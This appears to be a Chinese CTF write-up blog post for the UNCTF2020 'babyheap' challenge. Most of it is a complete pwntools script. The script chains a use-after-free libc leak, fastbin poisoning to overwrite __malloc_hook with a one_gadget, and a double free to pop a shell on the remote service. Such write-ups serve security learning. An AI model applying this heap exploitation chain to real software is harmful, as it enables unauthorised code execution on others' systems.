注意
本文最后更新于 2024-02-12,文中内容可能已过时。
UNCTF2020 中的 babyheap，官方 wp 用的是 unsorted bin attack 修改 fastbin 的最大大小。
所以特意看了一下这题，结果发现这题其实是 unsorted bin leak，不过不做白不做，花了一个小时做掉了。
等一下会找一下unsorted bin attack的题目
待补充…
# -*- coding: utf-8 -*-
from pwn import *
# Full send/receive trace on stderr; handy when a menu prompt does not match.
context.log_level = "debug"
#r = process('./level5-unsortbin')
# Connection to the challenge service; the commented-out process() line is the local variant.
r = remote("pwn.sixstars.team", 22505)
# NOTE: despite the name, `elf` is the challenge's libc, not the binary — it is only
# used below to look up elf.sym['__malloc_hook'].
elf = ELF('./libc.so.6')
#elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
def add_note(size):
    """Pick menu option 1 (allocate a note) and answer the size prompt.

    `size` is sent as its `str()` form; `r` is the module-level connection.
    """
    exchange = (
        (">> ", "1"),
        ("Size:", str(size)),
    )
    for prompt, answer in exchange:
        r.sendlineafter(prompt, answer)
def show_note(idx):
    """Pick menu option 2 (display a note) and answer the id prompt.

    `idx` is sent as its `str()` form; `r` is the module-level connection.
    """
    exchange = (
        (">> ", "2"),
        ("id:", str(idx)),
    )
    for prompt, answer in exchange:
        r.sendlineafter(prompt, answer)
def edit_note(idx, content):
    """Pick menu option 3 (edit a note), answer the id prompt, then send `content`.

    `content` is passed through unchanged (bytes/str as given); `r` is the
    module-level connection.
    """
    exchange = (
        (">> ", "3"),
        ("id:", str(idx)),
        ("Content:", content),
    )
    for prompt, answer in exchange:
        r.sendlineafter(prompt, answer)
def dele_note(idx):
    """Pick menu option 4 (delete a note) and answer the id prompt.

    `idx` is sent as its `str()` form; `r` is the module-level connection.
    """
    exchange = (
        (">> ", "4"),
        ("id:", str(idx)),
    )
    for prompt, answer in exchange:
        r.sendlineafter(prompt, answer)
# Program-side defects this sequence relies on (visible from the call order below):
# a note can still be shown and edited after it was deleted (use-after-free read and
# write), and the same id can be deleted twice. Nulling the pointer on delete and
# refusing show/edit/delete on a null slot would close all three.
#
# Stage 1: leak a libc pointer by reading a freed note.
add_note(200)   # note 0 — larger than a fastbin chunk, so its free goes to the unsorted bin (per the author's notes)
add_note(0x68)  # note 1 — fastbin-sized, reused in stage 2
dele_note(0)
show_note(0)    # read after free: the start of freed note 0 now holds a bin pointer into libc
# Author's arithmetic for the leak (translated): the leaked pointer is main_arena + 0x58,
# __malloc_hook sits at main_arena - 0x10, hence __malloc_hook = leak - 0x68.
#main_arena + 0x58 = leak addr
#main_arena - 0x10 = __malloc_hook
#__malloc_hook = leak_addr - 0x68
# Exactly 6 bytes are consumed and zero-extended to 8 — assumes the pointer is the very
# first thing the program prints back; any prefix would skew the value.
malloc_hook_addr = u64(r.recv(6).ljust(8, '\x00')) - 0x68
libc_base = malloc_hook_addr - elf.sym['__malloc_hook']   # rebase with the symbol from ./libc.so.6
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]   # one_gadget offsets as recorded by the author; only index 2 is used
one_gadget = libc_base + one[2]
# Python 2 print statements (and str payloads above): this script targets Python 2 / old pwntools.
print "__malloc_hook: " + hex(malloc_hook_addr)
print "one_gadget: " + hex(one_gadget)
# Stage 2: write after free on note 1 so that a later allocation lands next to __malloc_hook.
dele_note(1)
edit_note(1, p64(malloc_hook_addr - 0x23))   # note 1 is edited after being freed
add_note(0x68)   # note 2 — presumably hands back the original chunk of note 1
add_note(0x68)   # note 3 — presumably hands back memory at malloc_hook_addr - 0x23
# 0x13 bytes of padding: together with the 0x10-byte chunk header this covers the 0x23
# offset, so p64(one_gadget) is written over __malloc_hook (assumes 0x10 header — TODO confirm).
edit_note(3, 'a' * 0x13 + p64(one_gadget))
#gdb.attach(r)
dele_note(1)   # the same id is deleted twice in a row; the second delete is what ends up
dele_note(1)   # invoking the overwritten hook (the mechanism is not shown in this script)
r.interactive()